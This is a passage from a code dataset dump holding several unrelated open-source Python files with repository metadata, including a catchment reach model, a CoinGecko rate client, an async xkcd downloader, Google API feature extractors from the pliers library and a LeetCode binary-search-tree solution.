dot.edge(reach.ID, list(reach.downstreamRefs)[0].ID, weight = '10')\n try:\n dot.render(filename=fileName, format = format, renderer=None, formatter=None)\n except:\n pass\n\nclass Reach(object):\n \"\"\"\n Class for reach.\n \"\"\"\n\n # Status flags\n flagWaiting = 0\n flagCanStart = 1\n flagRunning = 2\n flagRunDone = 3\n flagCanBeCleaned = 4\n flagCleaning = 5\n flagDone = 6\n flagError = 7\n flagUpstreamError = 8\n\n def __init__(self, ID, reachData, hydrologyMassLoadingsFileBase, signalStatusChange):\n \"\"\"\n Creats a reach object.\n \"\"\"\n if not type(reachData.RchIDDwn) is list: reachData.RchIDDwn = [reachData.RchIDDwn]\n self.ID = ID\n self.hydrologyMassLoadingsFile = ID + hydrologyMassLoadingsFileBase\n self.length = reachData.Len\n self.downstreamIDs = reachData.RchIDDwn\n self.upstreamIDs = []\n self.downstreamRef = {ID:None for ID in reachData.RchIDDwn}\n self.upstreamRef = {}\n self.width = reachData.WidWatSys\n self.slope = reachData.SloSidWatSys\n self.suspSolids = reachData.ConSus\n self.omSuspSolids = reachData.CntOmSusSol\n self.bulkDens = reachData.Rho\n self.porosity = reachData.ThetaSat\n self.omSediment = reachData.CntOM\n self.nSegments = 1\n self.signalStatusChange = signalStatusChange\n self.stat = Reach.flagWaiting\n self.hasDrift = reachData.Expsd\n self.hasUpstreamLoading = False\n self.x = reachData.X\n self.y = reachData.Y\n self.massOutflowFileNeeded = None\n\n def unlink(self):\n \"\"\"\n Returns an \"unlinked\" copy of the reach, with all references to other reaches and the catchment set to None.\n \"\"\"\n cp = copy.copy(self)\n cp.downstreamRef = None\n cp.upstreamRef = None\n cp.signalStatusChange = None\n return(cp)\n\n def set_downstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single downstream reach.\n \"\"\"\n if self.downstreamRef[reach.ID] is None: self.downstreamRef[reach.ID] = reach\n\n def set_upstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single upstream reach.\n \"\"\"\n if not reach.ID in self.upstreamRef.keys(): self.upstreamRef[reach.ID] = reach\n\n @property\n def 
status(self):\n \"\"\"\n Returns the status of this reach.\n If the status waiting, it will be updated first, by checking the upstream reaches.\n NB: this function has the property decorator, meaning that if the reach status is \n accessed as reach.status, this function will be called.\n \"\"\"\n if self.stat == Reach.flagWaiting: self.checkStatus()\n return(self.stat)\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets status of this reach.\n If the status is done, the downstream reaches will be asked to update their status as well.\n If the status is (upstream)error: all downstream reaches will get upstream error.\n NB: this function has the setter decorator, meaning that if a reach status is set using \n reach.status = status, this function will be called.\n \"\"\"\n self.stat = status\n if not self.signalStatusChange is None: self.signalStatusChange(self)\n if status in [Reach.flagError, Reach.flagUpstreamError]:\n for reach in self.downstreamRefs: reach.status = Reach.flagUpstreamError\n elif status == Reach.flagRunDone:\n for reach in self.downstreamRefs: reach.checkStatus()\n for reach in self.upstreamRefs: reach.checkStatus()\n self.checkStatus()\n \n @property\n def upstreamRefs(self):\n \"\"\"\n Returns iterator over upstream reaches\n \"\"\"\n return(iter(self.upstreamRef.values()))\n\n @property\n def downstreamRefs(self):\n \"\"\"\n Returns iterator over downstream reaches\n \"\"\"\n return(iter(self.downstreamRef.values()))\n\n @property\n def skip(self):\n return(not(self.hasUpstreamLoading or self.hasDrift))\n\n def waterResidenceTime(self,waterDepth,flowRate):\n return self.waterVolume(waterDepth)/flowRate\n\n def waterVolume(self,waterDepth):\n return self.waterCrossSectionArea(waterDepth)*self.length\n\n def waterCrossSectionArea(self,waterDepth):\n return waterDepth*(self.width + waterDepth*self.slope)\n\n def checkStatus(self):\n \"\"\"\n Checks status for this reach, by looking at the upstream and downstream reaches.\n If the current status is runDone and all downstream reaches are runDone as well, the status\n is set to canBeCleaned. 
\n If the status is all upstream reaches have status runDone or done, this reach will get status canStart.\n If any of the upstream reaches has status (upstream)error this reach will get status upstreamError\n \"\"\"\n\n if self.stat == Reach.flagRunDone:\n if not self.downstreamRefs or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.downstreamRefs]):\n self.status = Reach.flagCanBeCleaned\n elif self.stat == Reach.flagWaiting:\n if not self.upstreamRef or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.upstreamRefs]):\n self.status = Reach.flagCanStart\n elif any([reach.status in [Reach.flagError, Reach.flagUpstreamError] for reach in self.upstreamRefs]):\n self.status = Reach.flagUpstreamError\n\n def set_hasUpstreamLoading(self,flag = False):\n self.hasUpstreamLoading = flag or self.hasUpstreamLoading\n for reach in self.downstreamRefs:\n reach.set_hasUpstreamLoading(self.hasUpstreamLoading or self.hasDrift)\n\n def set_massOutflowFileNeeded(self):\n self.massOutflowFileNeeded = any([not reach.skip for reach in self.downstreamRefs])","repo_name":"xlandscape/CascadeToxswa-Component","sub_path":"module/src/Catchment.py","file_name":"Catchment.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28082961058","text":"import os\nfrom setuptools import setup, find_packages\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nwith open('requirements.txt') as f:\n install_requires = f.read().splitlines()\n\nsetup(\n name='django-simple-activity',\n version='1.1.1.dev0',\n packages=find_packages('src', exclude=('tests',)),\n package_dir={'': 'src'},\n include_package_data=True,\n license='Apache 2.0',\n description=(\n 'Simple, generic, activity streams '\n 'from the actions on your site.'),\n url='https://github.com/richardasaurus/django-simple-activity',\n author='Richard O\\'Dwyer',\n author_email='richard@richard.do',\n zip_safe=True,\n install_requires=install_requires\n)\n","repo_name":"richardARPANET/django-simple-activity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8701903908","text":"import requests\n\nfrom clients.currency.coingecko.defs import CoinGeckoCrypto\nfrom clients.currency.coingecko.exceptions import CoinGeckoRequestException\nfrom moneybox.settings import COINGECKO_URL, COINGECKO_TIMEOUT\nfrom wallet.models.currency import FiatCurrency\n\n\nclass CoinGeckoClient:\n def __init__(self, url: str = COINGECKO_URL, timeout: int = COINGECKO_TIMEOUT) -> None:\n self.url = url\n self.timeout = timeout\n\n def get_rates(self):\n try:\n response = requests.get(\n url=self.url.format(\n crypto_currencies=\",\".join(CoinGeckoCrypto.map_main_crypto_to_coingecko().values()),\n fiat_currency=FiatCurrency.RUB,\n ),\n timeout=self.timeout,\n )\n rates = response.json()\n except requests.exceptions.RequestException as e:\n raise CoinGeckoRequestException(e)\n result = dict()\n for k, v in rates.items():\n result[CoinGeckoCrypto.map_coingecko_to_main_crypto(k)] = round(v.get(FiatCurrency.RUB.lower()), 4)\n return result\n\n\ncoingecko_client = 
CoinGeckoClient()\n","repo_name":"tanja-ovc/django-moneybox","sub_path":"moneybox/clients/currency/coingecko/coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20351688594","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\nclass Voca:\n def __init__(self, voca):\n self.voca = voca\n\n def __lt__(self, other):\n return self.voca.lower() < other.voca.lower()\n\n\nif __name__ == \"__main__\":\n while True:\n t = int(input().strip())\n if t == 0:\n break\n que = []\n for _ in range(t):\n voca = Voca(input().strip())\n heapq.heappush(que, voca)\n answer: Voca = heapq.heappop(que)\n print(answer.voca)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2204/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17416527332","text":"import aiohttp\nimport asyncio\nimport time\n\nrecord=open(\"Task2_AsyncTime.txt\",\"w\")\nfilename = \"Task2_Async.txt\" # create a file with a unique name\nf=open(filename,'a') #APPENDING A SINGLE FILE SINCE I'M NOT SURE IF CREATING 200 FILES WOULD BE A GOOD IDEA\n\nasync def getOnePage(session,comic_id: int):\n url = f\"https://xkcd.com/{comic_id}/info.0.json\"\n async with session.get(url) as sesh:\n content=await sesh.read()\n print(content,file=f) #writing contents into the file one by one here\n print(f\"Begin downloading {url}\")\n result=await sesh.json()\n print(f\"Finished downloading {url}\")\n return result\n\nasync def getAllPages(session):\n tasks=[] #creating a dynamic array to store all the tasks we want to rin parallely\n for i in range(1,201): #will take values 1-200 in loop\n task=asyncio.create_task(getOnePage(session,i))\n tasks.append(task)\n \n \n results= await asyncio.gather(*tasks) #pointing to the list so that all the members are defined as async task\n return results\n\nasync def Main():\n async with aiohttp.ClientSession() as sesh:\n downloads = await getAllPages(sesh)\n return downloads\n\n\nif __name__ == \"__main__\":\n start=time.time()\n finalresult=asyncio.run(Main())\n timeTaken=time.time()-start\n print(f\"Time taken= {timeTaken:0.2f} seconds\")\n record.writelines(str(timeTaken)+\"\\n\")\n record.close\n\n\n\n \n","repo_name":"JebronLames32/KOSS_Task","sub_path":"Task2/Task1_Writeinfile_async.py","file_name":"Task1_Writeinfile_async.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27986984594","text":"''' Google API-based feature extraction classes. '''\n\nimport logging\nimport time\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\n\nfrom pliers.extractors.image import ImageExtractor\nfrom pliers.extractors.text import TextExtractor\nfrom pliers.extractors.video import VideoExtractor\nfrom pliers.transformers import (GoogleAPITransformer,\n GoogleVisionAPITransformer,\n GoogleAPITransformer)\nfrom pliers.extractors.base import ExtractorResult\nfrom pliers.utils import flatten_dict\n\n\nclass GoogleVisionAPIExtractor(GoogleVisionAPITransformer, ImageExtractor):\n\n ''' Base class for all Extractors that use the Google Vision API. 
'''\n\n VERSION = '1.0'\n\n def _extract(self, stims):\n request = self._build_request(stims)\n responses = self._query_api(request)\n\n results = []\n for i, response in enumerate(responses):\n if response and self.response_object in response:\n raw = response[self.response_object]\n results.append(ExtractorResult(raw, stims[i], self))\n elif 'error' in response:\n raise Exception(response['error']['message'])\n else:\n results.append(ExtractorResult([{}], stims[i], self))\n\n return results\n\n\nclass GoogleVisionAPIFaceExtractor(GoogleVisionAPIExtractor):\n\n ''' Identifies faces in images using the Google Cloud Vision API. '''\n\n request_type = 'FACE_DETECTION'\n response_object = 'faceAnnotations'\n\n def _to_df(self, result, handle_annotations=None):\n '''\n Converts a Google API Face JSON response into a Pandas Dataframe.\n\n Args:\n result (ExtractorResult): Result object from which to parse out a\n Dataframe.\n handle_annotations (str): How returned face annotations should be\n handled in cases where there are multiple faces.\n 'first' indicates to only use the first face JSON object, all\n other values will default to including every face.\n '''\n annotations = result._data\n if handle_annotations == 'first':\n annotations = [annotations[0]]\n\n face_results = []\n for i, annotation in enumerate(annotations):\n data_dict = {}\n for field, val in annotation.items():\n if 'Confidence' in field:\n data_dict['face_' + field] = val\n elif 'oundingPoly' in field:\n for j, vertex in enumerate(val['vertices']):\n for dim in ['x', 'y']:\n name = '%s_vertex%d_%s' % (field, j+1, dim)\n val = vertex[dim] if dim in vertex else np.nan\n data_dict[name] = val\n elif field == 'landmarks':\n for lm in val:\n if 'type' in lm:\n name = 'landmark_' + lm['type'] + '_%s'\n lm_pos = {name %\n k: v for (k, v) in lm['position'].items()}\n data_dict.update(lm_pos)\n else:\n data_dict[field] = val\n\n face_results.append(data_dict)\n\n return pd.DataFrame(face_results)\n\n\nclass GoogleVisionAPILabelExtractor(GoogleVisionAPIExtractor):\n\n ''' Labels objects in images using the Google Cloud Vision API. '''\n\n request_type = 'LABEL_DETECTION'\n response_object = 'labelAnnotations'\n\n def _to_df(self, result):\n res = {label['description']: label['score'] for label in result._data if label}\n return pd.DataFrame([res])\n\n\nclass GoogleVisionAPIPropertyExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts image properties using the Google Cloud Vision API. '''\n\n request_type = 'IMAGE_PROPERTIES'\n response_object = 'imagePropertiesAnnotation'\n\n def _to_df(self, result):\n colors = result._data['dominantColors']['colors']\n data_dict = {}\n for color in colors:\n rgb = color['color']\n key = [rgb.get('red', 0), rgb.get('green', 0), rgb.get('blue', 0)]\n key = ', '.join([str(v) for v in key])\n data_dict[key] = color['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVisionAPISafeSearchExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts safe search detection using the Google Cloud Vision API. '''\n\n request_type = 'SAFE_SEARCH_DETECTION'\n response_object = 'safeSearchAnnotation'\n\n def _to_df(self, result):\n return pd.DataFrame([result._data])\n\n\nclass GoogleVisionAPIWebEntitiesExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts web entities using the Google Cloud Vision API. 
'''\n\n request_type = 'WEB_DETECTION'\n response_object = 'webDetection'\n\n def _to_df(self, result):\n data_dict = {}\n if 'webEntities' in result._data:\n for entity in result._data['webEntities']:\n if 'description' in entity and 'score' in entity:\n data_dict[entity['description']] = entity['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVideoIntelligenceAPIExtractor(GoogleAPITransformer, VideoExtractor):\n\n ''' Extracts object features from videos using the Google Vision Video\n Intelligence API.\n\n Args:\n features (list): List of features to extract. LABEL_DETECTION extracts\n tags present throughout the provided segments (full video if none\n provided) as well as throughout the shots (depending on config).\n SHOT_CHANGE_DETECTION extracts a shot feature with onsets and\n durations corresponding to shot changes in the video.\n EXPLICIT_CONTENT_DETECTION extracts any frame onsets of explicit\n material.\n segments (list): List of JSON objects or dictionaries. Each dictionary\n should contain a startTimeOffset and an endTimeOffset field with\n timestamps of the format XX.XXs marking the desired segments upon\n which to extract features.\n config (dict): JSON object representing the desired configuration for\n extraction. See the Google Cloud Video Intelligence documentation\n for more details.\n timeout (int): Number of seconds to wait for video intelligence\n operation to finish. Defaults to 90 seconds.\n request_rate (int): Number of seconds to wait between polling the\n extraction operation for completion.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'videointelligence'\n _log_attributes = ('discovery_file', 'api_version', 'features', 'segments',\n 'config', 'timeout', 'request_rate')\n\n def __init__(self, features=['LABEL_DETECTION', 'SHOT_CHANGE_DETECTION',\n 'EXPLICIT_CONTENT_DETECTION'],\n segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.segments = segments\n self.config = config\n self.timeout = timeout\n self.request_rate = request_rate\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.videos().annotate(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _query_operations(self, name):\n if hasattr(self.service.operations(), 'get'):\n request_obj = self.service.operations().get(name=name)\n else:\n request_obj = self.service.projects().locations().\\\n operations().get(name=name)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n\n context = self.config if self.config else {}\n if self.segments:\n context['segments'] = self.segments\n\n with stim.get_filename() as filename:\n size = os.path.getsize(filename)\n LIMIT = 524288000\n if size > LIMIT:\n warnings.warn(\"Video file is very large ({} bytes) and may \"\n \"exceed the Google Video Intelligence payload \"\n \"limit ({} bytes).\".format(size, LIMIT))\n\n request = {\n 'inputContent': 
stim.get_bytestring(),\n 'features': self.features,\n 'videoContext': context\n }\n\n return request\n\n def _extract(self, stim):\n op_request = self._build_request(stim)\n operation = self._query_api(op_request)\n\n msg = \"Beginning video extraction with a timeout of %fs. Even for \"\\\n \"small videos, full extraction may take awhile.\" % self.timeout\n logging.warning(msg)\n\n operation_start = time.time()\n response = self._query_operations(operation['name'])\n while 'done' not in response and \\\n (time.time() - operation_start) < self.timeout:\n response = self._query_operations(operation['name'])\n time.sleep(self.request_rate)\n\n if (time.time() - operation_start) >= self.timeout:\n msg = \"The extraction reached the timeout limit of %fs, which \"\\\n \"means the API may not have finished analyzing the video \"\\\n \"and the results may be empty or incomplete.\" % self.timeout\n logging.warning(msg)\n\n return ExtractorResult(response, stim, self)\n\n def _get_onset_duration(self, timing_json):\n onset = float(timing_json['startTimeOffset'][:-1])\n end = float(timing_json['endTimeOffset'][:-1])\n return onset, (end - onset)\n\n def _parse_label(self, data, features, label):\n for segment in label.get('segments', []):\n onset, duration = self._get_onset_duration(segment['segment'])\n score = segment['confidence']\n data[(onset, duration)].update({f: score for f in features})\n\n def _parse_frame(self, data, features, annotation, score_key, max_time):\n frames = annotation.get('frames', [])\n for i, frame in enumerate(frames):\n onset = float(frame['timeOffset'][:-1])\n if (i + 1) == len(frames):\n end = max_time\n else:\n end = float(frames[i+1]['timeOffset'][:-1])\n duration = end - onset\n score = frame[score_key]\n data[(onset, duration)].update({f: score for f in features})\n\n def _to_df(self, result):\n response = result._data.get('response', {})\n data = defaultdict(dict)\n for r in response.get('annotationResults', []):\n for key, res in r.items():\n if 'Label' in key:\n for annot in res:\n feats = [annot['entity']['description']]\n for category in annot.get('categoryEntities', []):\n feats.append('category_' + category['description'])\n if key == 'frameLabelAnnotations':\n self._parse_frame(data, feats, annot, 'confidence',\n result.stim.duration)\n else:\n # Good for shot or segment labels\n self._parse_label(data, feats, annot)\n elif key == 'shotAnnotations':\n for i, shot in enumerate(res):\n onset, duration = self._get_onset_duration(shot)\n data[(onset, duration)].update({\n 'shot_id': i\n })\n elif key == 'explicitAnnotation':\n feature = 'pornographyLikelihood'\n self._parse_frame(data, [feature], res, feature,\n result.stim.duration)\n\n df = pd.DataFrame(list(data.values()))\n # If multiple confidences were parsed, uses the last one\n if len(data) > 0:\n onsets, durations = zip(*list(data.keys()))\n result._onsets = onsets\n result._durations = durations\n result.features = list(df.columns)\n return df\n\n\nclass GoogleVideoAPILabelDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts image labels using the Google Video Intelligence API '''\n\n def __init__(self, mode='SHOT_MODE', stationary_camera=False,\n segments=None, timeout=90, request_rate=5, num_retries=3,\n discovery_file=None, api_version='v1', max_results=100,\n rate_limit=None, frame_confidence_threshold=None,\n video_confidence_threshold=None):\n\n config = {\n 'labelDetectionConfig': {\n 'labelDetectionMode': mode,\n 'stationaryCamera': stationary_camera\n }\n }\n\n if 
frame_confidence_threshold is not None:\n if mode not in ['FRAME_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"frame_confidence_threshold can only be specified in\"\n \"FRAME or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['frameConfidenceThreshold'] = \\\n frame_confidence_threshold\n\n if video_confidence_threshold is not None:\n if mode not in ['SHOT_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"video_confidence_threshold can only be specified in\"\n \"SHOT or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['videoConfidenceThreshold'] = \\\n video_confidence_threshold\n\n super().__init__(features=['LABEL_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIShotDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts shot changes using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['SHOT_CHANGE_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIExplicitDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts explicit content using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['EXPLICIT_CONTENT_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIExtractor(GoogleAPITransformer, TextExtractor):\n\n ''' Extracts natural language features from text documents using the\n Google Natural Language API.\n\n Args:\n features (list): List of features (str) to extract. Available\n features: extractSyntax, extractEntities, extractDocumentSentiment,\n extractEntitySentiment, and classifyText. See Google Natural\n Language API documentation for more details.\n language (str): The ISO-639-1 or BCP-47 identifier for the document\n language. If None is provided, API auto-detects the language.\n is_html (bool): When True, the document's text is expected to be\n HTML. 
Otherwise, plain text is assumed.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'language'\n _log_attributes = ('discovery_file', 'api_version', 'features',\n 'language', 'is_html')\n\n def __init__(self, features=['extractSyntax',\n 'extractEntities',\n 'extractDocumentSentiment',\n 'extractEntitySentiment',\n 'classifyText'],\n language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.language = language\n self.is_html = is_html\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.documents().annotateText(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n document = {\n 'type' : 'HTML' if self.is_html else 'PLAIN_TEXT',\n 'content' : stim.text\n }\n\n if self.language:\n document['language'] = self.language\n\n request = {\n 'document': document,\n 'features': { f : True for f in self.features },\n 'encodingType': 'UTF32'\n }\n\n return request\n\n def _extract(self, stim):\n request = self._build_request(stim)\n response = self._query_api(request)\n return ExtractorResult(response, stim, self)\n\n def _get_span(self, text_json):\n offset = text_json['text']['beginOffset']\n content = text_json['text']['content']\n return { 'begin_char_index' : offset,\n 'end_char_index' : offset + len(content),\n 'text' : content }\n\n def _to_df(self, result):\n response = result._data\n data = []\n\n # One row/object for all document-level features\n document_data = {}\n\n if 'extractDocumentSentiment' in self.features:\n sentiment = response['documentSentiment']\n document_data.update(flatten_dict(sentiment, 'sentiment'))\n\n # Sentence level sentiment\n for sentence in response.get('sentences', []):\n sentence_data = self._get_span(sentence)\n sentiment = sentence['sentiment']\n sentence_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(sentence_data)\n\n for category in response.get('categories'):\n key = 'category_%s' % category['name']\n document_data[key] = category['confidence']\n\n # Include only if there are document-level features\n if document_data:\n data.append(document_data)\n\n # Entity-level features\n for entity in response.get('entities', []):\n entity_copy = entity.copy()\n mentions = entity_copy.pop('mentions', [])\n entity_copy.pop('name', None)\n entity_copy = flatten_dict(entity_copy)\n\n for m in mentions:\n entity_data = self._get_span(m)\n entity_data.update(entity_copy)\n # Overwrite top-level sentiment with mention-level\n sentiment = m.get('sentiment', {})\n entity_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(entity_data)\n\n # Token-level syntax features\n for token in response.get('tokens', []):\n token_data = self._get_span(token)\n token_data['lemma'] = token['lemma']\n token_data.update(token['partOfSpeech'])\n dependency = flatten_dict(token['dependencyEdge'], 'dependency')\n token_data.update(dependency)\n data.append(token_data)\n\n df = pd.DataFrame(data)\n df['language'] = 
response['language']\n return df\n\n\nclass GoogleLanguageAPIEntityExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts entity labels in text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntities'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractDocumentSentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISyntaxExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts syntax properties of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractSyntax'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPITextCategoryExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts document category using the Google Language API.\n See the API documentation for the taxonomy of categories:\n https://cloud.google.com/natural-language/docs/categories '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['classifyText'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIEntitySentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of entities found in text using the Google Language\n API. Produces identical results to the entity extractor but with additional\n sentiment analysis. 
'''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntitySentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/api/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"23915777194","text":"\"\"\"\nLeetcode #108 Convert Sorted Array to Binary Search Tree\n\nGiven an integer array nums where the elements are \nsorted in ascending order, convert it to a height-balanced \nbinary search tree.\n\nA height-balanced binary tree is a binary tree in which the \ndepth of the two subtrees of every node never differs by \nmore than one.\n\nExample 1:\nInput: nums = [-10,-3,0,5,9]\nOutput: [0,-3,9,-10,null,5]\nExplanation: [0,-10,5,null,-3,null,9] is also accepted:\n\nExample 2:\nInput: nums = [1,3]\nOutput: [3,1]\nExplanation: [1,null,3] and [3,1] are both height-balanced BSTs.\n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums is sorted in a strictly increasing order.\n\nAlgorithm/DS used: Binary search using midpoint for creating a \nnode and stack for traversal\n\nO(N) worst case time where N is the length of nums\n\nO(N) worst case space where N is the length of nums\n\n\"\"\"\nfrom typing import List\nfrom typing import Tuple\nfrom collections import deque\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def _createNodeFromMidpoint(self, nums: List[int]) -> Tuple[TreeNode, List, List]:\n if not nums:\n return (None, [], [])\n m = len(nums) // 2\n return (TreeNode(val=nums[m]), nums[:m], nums[m+1:])\n\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n m = len(nums) // 2\n root = TreeNode(val=nums[m])\n s = [(root, nums[:m], nums[m+1:])]\n while s:\n current = s.pop()\n left = self._createNodeFromMidpoint(current[1])\n right = self._createNodeFromMidpoint(current[2])\n current[0].left = left[0]\n current[0].right = right[0]\n if left[0]:\n s.append(left)\n if right[0]:\n s.append(right)\n return root\n\n\ndef breadth_first_traverse(root: TreeNode) -> List:\n result = []\n q = deque()\n q.append(root)\n while q:\n current = q.popleft()\n if not current:\n result.append(current)\n elif current:\n result.append(current.val)\n if current.left or current.right:\n q.append(current.left)\n q.append(current.right)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [-10,-3,0,5,9] is [0,-3,9,-10,None,5, None] and the Actual result is: \" +\n str(breadth_first_traverse(s.sortedArrayToBST([-10, -3, 0, 5, 9]))))\n assert breadth_first_traverse(s.sortedArrayToBST(\n [-10, -3, 0, 5, 9])) == [0, -3, 9, -10, None, 5, None]\n assert breadth_first_traverse(s.sortedArrayToBST(\n [1, 3])) == [3, 1, None]\n\n # Insert more tests here...\n\n\nif __name__ == \"__main__\":\n 
